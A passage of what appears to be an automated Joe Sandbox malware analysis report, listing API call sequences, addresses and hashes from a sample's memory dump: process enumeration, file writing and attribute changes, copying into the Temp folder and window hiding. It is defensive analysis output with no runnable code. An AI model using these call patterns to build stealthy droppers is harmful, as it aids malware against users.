                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$CloseCreateHandlePointerWritelstrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3722912177-0
                                                                                                                                                                                                                                                      • Opcode ID: 1a79f5b1ce56c777671a6a6f60480a4a14880d8d03aa35684898b3f36d659bb1
                                                                                                                                                                                                                                                      • Instruction ID: 3c4057b65f01b9325965588dfd8d4090f12d06d54ddacd8982de50a353a82197
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a79f5b1ce56c777671a6a6f60480a4a14880d8d03aa35684898b3f36d659bb1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B01F2B2A40200BBE6302776AC4EF9B3A6CEBC5B61F404026FA01E10D1DA784A15C779
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0041426F
                                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041427A
                                                                                                                                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 0041429D
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004142E1
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32lstrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 760834177-0
                                                                                                                                                                                                                                                      • Opcode ID: 6d5f8f7563b110a2be7dfcd0fb4c6b2ad1ace028690d2df6fa8031f375f41686
                                                                                                                                                                                                                                                      • Instruction ID: e5bf67a6a68b66bc80df5e6fb5e360cd43871c20d938a3156f5d357483015507
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d5f8f7563b110a2be7dfcd0fb4c6b2ad1ace028690d2df6fa8031f375f41686
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9301DB71700114ABCB105B65DC489EB7BBCEB48395F0000A6FD05D3141EB34DDD18B59
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,76AE8A60,?,?,?,004108D0,?,00000000,?), ref: 004106A5
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000,?,?,004108D0,?,00000000,?), ref: 004106B6
                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,004108D0,?,00000000,?,?,004108D0,?,00000000,?), ref: 004106D1
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,004108D0,?,00000000,?), ref: 004106D8
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000002,?,?,004108D0,?,00000000,?), ref: 004106E3
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$Attributes$CloseCreateHandleWrite
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 692393803-0
                                                                                                                                                                                                                                                      • Opcode ID: a28542c8d8194dd271a427e1f27038af7f1ed474923027b7147f63bb0d485c30
                                                                                                                                                                                                                                                      • Instruction ID: 8754977078fc8a3942d47795b7f5e1f7d7f30a626694bd36d382f9fa2b757add
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a28542c8d8194dd271a427e1f27038af7f1ed474923027b7147f63bb0d485c30
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4501A471600208BBDB209FA5DC49FAF7F6CEB89770F504026FA0196191C6B09DA2DB64
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,76AE83C0,76AE8A60), ref: 004142FE
                                                                                                                                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 00414321
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00414351
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1083639309-0
                                                                                                                                                                                                                                                      • Opcode ID: 157c52ed4ad1ed28b8987201942e27a3869906bcf08200f0e48f127d2eaf181a
                                                                                                                                                                                                                                                      • Instruction ID: c32f649fe0a1eed3cabc287f82f20bd2c8a0ac794ff4a9554fbc0528c99487c3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 157c52ed4ad1ed28b8987201942e27a3869906bcf08200f0e48f127d2eaf181a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5FF0F671701128ABCB205B75DC4CEEB7BBCEB857A1F000066FD16E2190EF38C9958A69
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004141F4
                                                                                                                                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 00414213
                                                                                                                                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 0041422E
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00414239
                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(?,?,000000C8), ref: 00414253
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpyn
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1759823670-0
                                                                                                                                                                                                                                                      • Opcode ID: fbfd6ea1b3d92064f0560a5b95bb04e4245b77c10fc6cde3412c49f5f4632f92
                                                                                                                                                                                                                                                      • Instruction ID: 6962ffd0d0100b5debede7622d3bcfda1a549c830d4b7470604ba3dd6598fd52
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbfd6ea1b3d92064f0560a5b95bb04e4245b77c10fc6cde3412c49f5f4632f92
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6901A471501124ABD720DB64DC48FEA77BCEB08361F4041A1F855E21D0DB34EED58A5A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0041446A
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00414477
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00414480
                                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000080), ref: 004144AD
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 004144B8
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$Rect$DesktopShow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1907590291-0
                                                                                                                                                                                                                                                      • Opcode ID: 06a2c6ea97281da4f51dfe5ba57a3831f28f39d46fa729c5be2a34bd9ac7b83a
                                                                                                                                                                                                                                                      • Instruction ID: ef3228d50e6293720b143431d0110c4ac7fec5afb805337dd0511a0ed8060fe1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06a2c6ea97281da4f51dfe5ba57a3831f28f39d46fa729c5be2a34bd9ac7b83a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48F0EC72900119BFDF11DFE8DD49FEE7BBDEB08701F044151BA00E61A4CA75AA518FA4
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0045A330), ref: 0041C7F0
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0041C811
                                                                                                                                                                                                                                                      • EnumWindows.USER32(Function_0001C66F,00000000), ref: 0041C826
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041C82E
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(0045A330), ref: 0041C847
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSectionSleep$EnterEnumLeaveWindows
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 970108969-0
                                                                                                                                                                                                                                                      • Opcode ID: cac9e1c889c9a1202b30a9704d17d0ea4c68b7497903b2e807aaafec3fc2a205
                                                                                                                                                                                                                                                      • Instruction ID: 347c3037cfa51b170d6f4194da5302b1615cf2b86e42af8d09f192f7a696e1da
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cac9e1c889c9a1202b30a9704d17d0ea4c68b7497903b2e807aaafec3fc2a205
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D9F054317843119BD720AF649DC9BAB32D8B71A713F646033ED00D23A0D769DCA1C66E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?), ref: 004283FF
                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 0042840B
                                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00428413
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0042841B
                                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00428427
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1445889803-0
                                                                                                                                                                                                                                                      • Opcode ID: bfd83073e539a0ccdb6337cd3a1b89e76caeeb8a38b1eb6fd68b15f3d1e38019
                                                                                                                                                                                                                                                      • Instruction ID: 0c9aaaf9d000bd7eb92e406d218c57d3fa9a5442332ca6363a6d1f69c74d18a7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bfd83073e539a0ccdb6337cd3a1b89e76caeeb8a38b1eb6fd68b15f3d1e38019
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BAF0F976E411249BCB20EFF4EC0859EB7B8FB18355BC24875D801E7210EA75A925CB99
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004079EF
                                                                                                                                                                                                                                                        • Part of subcall function 004140CA: SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?,76AE8A60,?,?,0041080C,00000026,?,?,00000000,?), ref: 004140DE
                                                                                                                                                                                                                                                        • Part of subcall function 004140CA: SHGetPathFromIDListA.SHELL32(?,?,?,?,0041080C,00000026,?,?,00000000,?), ref: 004140E8
                                                                                                                                                                                                                                                        • Part of subcall function 004140CA: SHGetMalloc.SHELL32(?), ref: 004140F2
                                                                                                                                                                                                                                                        • Part of subcall function 004140CA: lstrcatA.KERNEL32(?,0042A3B0,?,?,0041080C,00000026,?,?,00000000,?), ref: 00414113
                                                                                                                                                                                                                                                        • Part of subcall function 00407850: Sleep.KERNEL32(00000005,?,76AE8A60,00000000), ref: 00407864
                                                                                                                                                                                                                                                        • Part of subcall function 00407850: wsprintfA.USER32 ref: 00407883
                                                                                                                                                                                                                                                        • Part of subcall function 00407850: FindFirstFileA.KERNEL32(?,?), ref: 00407896
                                                                                                                                                                                                                                                        • Part of subcall function 00407850: wsprintfA.USER32 ref: 004078D4
                                                                                                                                                                                                                                                        • Part of subcall function 00407850: FindNextFileA.KERNEL32(00000000,00000010), ref: 0040798E
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,76AE8A60), ref: 00407A46
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,Desktop,?,?,?,76AE8A60), ref: 00407A84
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FileFindwsprintf$CountFirstFolderFromListLocationMallocNextPathSleepSpecialTicklstrcatlstrcpylstrlen
                                                                                                                                                                                                                                                      • String ID: Desktop
                                                                                                                                                                                                                                                      • API String ID: 1306859140-3336322104
                                                                                                                                                                                                                                                      • Opcode ID: 88b02a22575b08bf3629dd0f1567974b0d6cc662ad6f1002e125712ec9440293
                                                                                                                                                                                                                                                      • Instruction ID: d758924f8f924a0cb4478b1c2a6b9e0f80ec40a8d7e309cd9d1a2c00b3c217ad
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 88b02a22575b08bf3629dd0f1567974b0d6cc662ad6f1002e125712ec9440293
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF31FC71E0C218AFEB10A764EC49BEB37A99B50305F4040BBE18466192DA7C6EC4CF5A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\), ref: 00401EF8
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00401F05
                                                                                                                                                                                                                                                      • CopyFileA.KERNEL32(?,?,00000000), ref: 00401F83
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00401EEC
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CopyFilelstrcpylstrlen
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                                      • API String ID: 4075108951-787714339
                                                                                                                                                                                                                                                      • Opcode ID: aff398feedf124acc82fad0585b1d7ca4975056247b61f76f7028d9bb95457f8
                                                                                                                                                                                                                                                      • Instruction ID: 430151959db830f2a2b4c62ade9a8cffceb94f515da44b32d0551270b3886620
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aff398feedf124acc82fad0585b1d7ca4975056247b61f76f7028d9bb95457f8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7321DA7294935AAADF10EAB0DC45EDF776C5B02305F0004B7E908F31A1E778DA4A8B69
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00411608: lstrlenA.KERNEL32(?), ref: 0041167D
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040C5FC
                                                                                                                                                                                                                                                        • Part of subcall function 00413663: lstrlenA.KERNEL32(4941262305804196,?,?,00000000), ref: 00413691
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,.exe), ref: 0040C62C
                                                                                                                                                                                                                                                        • Part of subcall function 00401B8D: Sleep.KERNEL32(0000012C), ref: 00401BCE
                                                                                                                                                                                                                                                        • Part of subcall function 00401B8D: Sleep.KERNEL32(0000012C), ref: 00401BE0
                                                                                                                                                                                                                                                        • Part of subcall function 00401B8D: Sleep.KERNEL32(0000012C), ref: 00401BF2
                                                                                                                                                                                                                                                        • Part of subcall function 00401B8D: SetFileAttributesA.KERNEL32(?,00000080), ref: 00401C1F
                                                                                                                                                                                                                                                        • Part of subcall function 00401B8D: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00401C36
                                                                                                                                                                                                                                                        • Part of subcall function 00401B8D: WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 00401C4F
